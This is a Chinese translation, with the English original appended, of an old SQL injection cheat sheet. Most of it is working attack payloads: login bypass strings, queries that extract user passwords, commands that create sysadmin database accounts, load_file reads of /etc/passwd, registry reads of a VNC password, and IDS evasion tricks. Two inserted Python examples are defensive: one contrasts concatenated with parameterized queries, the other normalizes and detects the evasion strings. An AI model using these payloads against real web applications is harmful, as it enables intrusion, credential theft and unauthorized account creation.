[Translation] SQL Injection Techniques Summary
++++++++++++++++++++++++++++
By zeroday.
zeroday [ at ] blacksecurity.org
---------------------------------------------
Translated by: 浪跡天.Iceskysl@1.S.T
Iceskysl_At_www.iceskysl.net
Date: 2006.5.21
Foreword:
Lately I have been reading a lot of material written by foreign authors, and judging by the dates the same techniques were in use there a good while before they reached us. For example, SQL injection against ASP appeared abroad in 2002 and against PHP in 2004, whereas we did not encounter it until 2005; look how far behind that is!
To keep up with the latest developments I make a point of reading English material. Some of it is long, some short; my time is limited and I cannot translate all of it, so I only pick out the pieces I think are most worth your reading, in the hope that you learn something from them.
PS: My English is limited, and much of this is a loose translation based on my own understanding. If anything is wrong, please point it out. Thanks!
====||Contents||=====
--------------------
1. Introduction
2. Testing for vulnerabilities
3. Gathering information
4. Data types
5. Grabbing passwords
6. Creating database accounts
7. MySQL exploitation
8. Server name and configuration
9. Finding the VNC password in the registry
10. Evading IDS detection
11. Using char() in MySQL
12. Evading IDS detection with comments
13. Building strings without quotes
====||Article begins||====
1. Introduction
When a server has only port 80 open, that is a fair sign the administrator keeps the system well patched, so the most effective attack to turn to is a web attack. SQL injection is the most commonly used one. Attacking the web application (ASP, PHP, JSP, CGI and so on) is much simpler than attacking the operating system or its other services.
SQL injection works by using the input fields of a page to trick the application into running queries or other commands we construct. A web site offers many places to enter parameters, such as the username, password or e-mail address.
2. Testing for vulnerabilities
Start with the simplest tests:
- Login:' or 1=1--
- Pass:' or 1=1--
- http://website/index.asp?id=' or 1=1--
There are also forms like these:
- ' having 1=1--
- ' group by userid having 1=1--
- ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--
- ' union select sum(columnname) from tablename--
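The login bypass tested in section 2, seen from the defender's side: an added Python example (not from the original paper) that runs the paper's first test string against a concatenated query and against a parameterized one. The users table and its single record are constructed here for the demonstration; SQLite is used because, like MS SQL, it treats `--` as a comment to end of line.

```python
import sqlite3

# Constructed sample schema and user record; not from the original paper.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    return db

def login_vulnerable(db, login, password):
    """String concatenation: the input becomes part of the SQL text,
    so ' or 1=1-- closes the literal, adds a tautology and comments
    out the password check."""
    sql = ("SELECT login FROM users WHERE login = '" + login +
           "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_parameterized(db, login, password):
    """Bound parameters: the input is passed as data and is never
    parsed as SQL, so the same string is just a non-existent login."""
    sql = "SELECT login FROM users WHERE login = ? AND password = ?"
    row = db.execute(sql, (login, password)).fetchone()
    return row[0] if row else None

PAYLOAD = "' or 1=1--"   # the first test string from section 2

def demo():
    db = make_db()
    return {
        "vulnerable": login_vulnerable(db, PAYLOAD, "anything"),
        "parameterized": login_parameterized(db, PAYLOAD, "anything"),
        "legit": login_parameterized(db, "admin", "S3cret!"),
    }

if __name__ == "__main__":
    print(demo())
```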
3. Gathering information
- ' or 1 in (select @@version)--
- ' union all select @@version--
These return the system version and patch level.
4. Data types
Oracle database>>
-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
-->SYS.USER_TABLES
-->SYS.USER_VIEWS
-->SYS.USER_TAB_COLUMNS
-->SYS.USER_CATALOG
-->SYS.USER_TRIGGERS
-->SYS.ALL_TABLES
-->SYS.TAB
MySQL database
-->mysql.user
-->mysql.host
-->mysql.db
MS Access database
-->MsysACEs
-->MsysObjects
-->MsysQueries
-->MsysRelationships
MS SQL Server database
-->sysobjects
-->syscolumns
-->systypes
-->sysdatabases
5. Grabbing passwords
Use statements like the following...
//save the query result
step1 : '; begin declare @var varchar(8000) set @var=':' select @var=@var+' '+login+'/'+password+' ' from users where login > @var select @var as var into temp end --
//read the information back
step2 : ' and 1 in (select var from temp)--
//drop the temporary table
step3 : ' ; drop table temp --
6. Creating database accounts
MS SQL
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'
MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))
Access
CREATE USER name IDENTIFIED BY 'pass123'
Postgres (requires Unix account)
CREATE USER name WITH PASSWORD 'pass123'
Oracle
CREATE USER name IDENTIFIED BY pass123
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;
7. MySQL OS interaction
Use a UNION query to dump the contents of a file, for example:
- ' union select 1,load_file('/etc/passwd'),1,1,1;
8. Server name and configuration
- ' and 1 in (select @@servername)--
- ' and 1 in (select servername from master.sysservers)--
9. Finding the VNC password (registry)
Example statements:
- '; declare @out binary(8)
- exec master..xp_regread
- @rootkey = 'HKEY_LOCAL_MACHINE',
- @key = 'SOFTWARE\ORL\WinVNC3\Default',
- @value_name='password',
- @value = @out output
- select cast (@out as bigint) as x into TEMP--
- ' and 1 in (select cast(x as varchar) from temp)--
10. Evading IDS detection
Evading the ' OR 1=1 signature
- ' OR 'unusual' = 'unusual'
- ' OR 'something' = 'some'+'thing'
- ' OR 'text' = N'text'
- ' OR 'something' like 'some%'
- ' OR 2 > 1
- ' OR 'text' > 't'
- ' OR 'whatever' in ('whatever')
- ' OR 2 BETWEEN 1 and 3
11. Using the char() function in MySQL
Injection without quotes, for example (string = "%"):
--> ' or username like char(37);
Injection with quotes, for example (string = "root"):
--> ' union select * from users where login = char(114,111,111,116);
Using load_file() in a union, for example (string = "/etc/passwd"):
-->' union select 1,(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
Checking whether a file exists, for example (string = "n.ext"):
-->' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
12. Using comment markers to evade IDS
Examples:
-->'/**/OR/**/1/**/=/**/1
-->Username:' or 1/*
-->Password:*/=1--
-->UNI/**/ON SEL/**/ECT (!!! This one is rarely seen and should be very useful !!!)
-->(Oracle) '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
-->(MS SQL) '; EXEC ('SEL' + 'ECT US' + 'ER')
13. Strings without quotes
Use char() or 0x to construct statements that contain no quotes.
--> INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)
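Sections 10 through 13 all rely on an IDS matching the raw input: inline comments, string concatenation, the N'' prefix, char() and 0x literals hide the OR 1=1, UNION SELECT and EXEC tokens from a naive signature. The added Python example below (not from the original paper) normalizes those forms before signature matching, then runs the paper's own evasion strings through it; inline comments are deleted rather than replaced by a space so that both UNI/**/ON and OR/**/1/**/=/**/1 collapse to a matchable form. The signature names and the normalization steps are my own choices.

```python
import re

def _decode_char(m):
    """char(114,111,111,116) or char(0x70) -> a quoted literal."""
    parts = [p.strip() for p in m.group(1).split(",")]
    codes = [int(p, 16) if p.startswith("0x") else int(p) for p in parts]
    return "'" + "".join(chr(c) for c in codes) + "'"

def _decode_hex(m):
    """0x64 -> 'd'; odd-length hex is left untouched."""
    h = m.group(1)
    return m.group(0) if len(h) % 2 else "'" + bytes.fromhex(h).decode("latin-1") + "'"

def normalize(sql):
    """Undo the obfuscations from sections 10-13 before matching."""
    s = sql.lower()
    s = re.sub(r"/\*.*?\*/", "", s)               # UNI/**/ON, OR/**/1/**/=/**/1
    s = re.sub(r"--.*$", "", s)                   # trailing -- comment
    s = re.sub(r"\bchar\(([0-9a-fx,\s]+)\)", _decode_char, s)
    s = re.sub(r"\b0x([0-9a-f]+)\b", _decode_hex, s)
    s = re.sub(r"\bn'", "'", s)                   # N'text' -> 'text'
    s = re.sub(r"'\s*(\+|\|\|)\s*'", "", s)       # 'SEL' + 'ECT' -> 'select'
    return re.sub(r"\s+", " ", s).strip()

# Signatures applied to the normalized text (my own, constructed rules).
SIGNATURES = {
    "tautology": re.compile(r"\bor\s*('[^']*'|\d+)\s*=\s*\1"),
    "union_select": re.compile(r"\bunion\s*(all\s*)?select\b"),
    "load_file": re.compile(r"\bload_file\s*\("),
    "exec": re.compile(r";\s*(exec|execute\s+immediate)\b"),
}

def classify(sql):
    """Return (normalized text, sorted list of matched signature names)."""
    n = normalize(sql)
    return n, sorted(name for name, rx in SIGNATURES.items() if rx.search(n))

if __name__ == "__main__":
    # the paper's own evasion strings, used here as sample input
    for probe in ["'/**/OR/**/1/**/=/**/1",
                  "' OR 'something' = 'some'+'thing'",
                  "'UNI/**/ON SEL/**/ECT 1,2",
                  "'; EXEC ('SEL' + 'ECT US' + 'ER')"]:
        print(classify(probe))
```

Comparisons such as 2 > 1, LIKE 'some%' or BETWEEN from section 10 are not literal equalities, so this rule set does not see them; catching those needs the statement parsed, not just normalized.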
======================================================================
Appendix: original text:
Sql Injection Paper
By zeroday.
zeroday [ at ] blacksecurity.org
1.Introduction.
2.Testing for vulnerabilities.
3.Gathering Information.
4.Data types.
5.Grabbing Passwords.
6.Create DB accounts.
7.MySQL OS Interaction.
8.Server name and config.
9.Retrieving VNC password from registry.
10.IDS Signature Evasion.
11.mySQL Input Validation Circumvention using Char().
12.IDS Signature Evasion using comments.
13.Strings without quotes.
1. When a box only has port 80 open, it's almost certain the admin will patch his server,
so the best thing to turn to is web attacks. SQL injection is one of the most common web attacks.
You attack the web application (ASP, JSP, PHP, CGI, etc.) rather than the webserver
or the services running on the OS.
SQL injection is a way to trick the application into running a query or command supplied as input via web pages;
most websites take parameters from the user like username and password or even their emails.
They all use SQL queries.
2. First off, you should start with something simple.
- Login:' or 1=1--
- Pass:' or 1=1--
- http://website/index.asp?id=' or 1=1--
These are simple ways to try; other ones are:
- ' having 1=1--
- ' group by userid having 1=1--
- ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--
- ' union select sum(columnname) from tablename--
3.Gathering Information.
- ' or 1 in (select @@version)--
- ' union all select @@version--
These will find the actual version of the server, OS/service pack.
4.Data types.
Oracle
-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
-->SYS.USER_TABLES
-->SYS.USER_VIEWS
-->SYS.USER_TAB_COLUMNS
-->SYS.USER_CATALOG
-->SYS.USER_TRIGGERS
-->SYS.ALL_TABLES
-->SYS.TAB
MySQL
-->mysql.user
-->mysql.host
-->mysql.db
MS access
-->MsysACEs
-->MsysObjects
-->MsysQueries
-->MsysRelationships
MS SQL Server
-->sysobjects
-->syscolumns
-->systypes
-->sysdatabases
5.Grabbing passwords
'; begin declare @var varchar(8000) set @var=':' select @var=@var+' '+login+'/'+password+' ' from users where login > @var select @var as var into temp end --
' and 1 in (select var from temp)--
' ; drop table temp --
6.Create DB accounts.
MS SQL
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'
MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))
Access
CREATE USER name IDENTIFIED BY 'pass123'
Postgres (requires Unix account)
CREATE USER name WITH PASSWORD 'pass123'
Oracle
CREATE USER name IDENTIFIED BY pass123
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;
7.MySQL OS Interaction
- ' union select 1,load_file('/etc/passwd'),1,1,1;
8.Server name and config.
- ' and 1 in (select @@servername)--
- ' and 1 in (select servername from master.sysservers)--
9.Retrieving VNC password from registry.
- '; declare @out binary(8)
- exec master..xp_regread
- @rootkey = 'HKEY_LOCAL_MACHINE',
- @key = 'SOFTWARE\ORL\WinVNC3\Default',
- @value_name='password',
- @value = @out output
- select cast (@out as bigint) as x into TEMP--
- ' and 1 in (select cast(x as varchar) from temp)--
10.IDS Signature Evasion.
Evading ' OR 1=1 Signature
- ' OR 'unusual' = 'unusual'
- ' OR 'something' = 'some'+'thing'
- ' OR 'text' = N'text'
- ' OR 'something' like 'some%'
- ' OR 2 > 1
- ' OR 'text' > 't'
- ' OR 'whatever' in ('whatever')
- ' OR 2 BETWEEN 1 and 3
11.mySQL Input Validation Circumvention using Char().
Inject without quotes (string = "%"):
--> ' or username like char(37);
Inject with quotes (string="root"):
--> ' union select * from users where login = char(114,111,111,116);
load files in unions (string = "/etc/passwd"):
-->' union select 1,(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
Check for existing files (string = "n.ext"):
-->' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
12.IDS Signature Evasion using comments.
-->'/**/OR/**/1/**/=/**/1
-->Username:' or 1/*
-->Password:*/=1--
-->UNI/**/ON SEL/**/ECT
-->(Oracle) '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
-->(MS SQL) '; EXEC ('SEL' + 'ECT US' + 'ER')
13.Strings without quotes.
--> INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)
Greets: kaneda, modem, wildcard, #black and pulltheplug.